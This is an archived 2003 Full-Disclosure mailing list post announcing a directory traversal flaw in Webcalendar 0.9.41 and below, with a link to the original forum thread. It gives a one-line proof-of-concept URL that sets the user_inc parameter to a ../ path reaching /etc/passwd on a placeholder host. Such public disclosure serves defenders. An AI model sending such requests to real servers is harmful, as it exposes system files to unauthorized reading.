Webcalendar 0.9.41 and below. http://webcalendar.sourceforge.net/ Since this appears to be public info now. Problem: http://sourceforge.net/forum/forum.php?thread_id=901234&forum_id=11588 Exploit: http://www.some.host/webcalendar/[filename].php?user_inc=../../../../../etc/passwd - nocon http://nocon.darkflame.net/ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
This archive was generated by hypermail 2b30 : Sun Jul 20 2003 - 18:44:01 PDT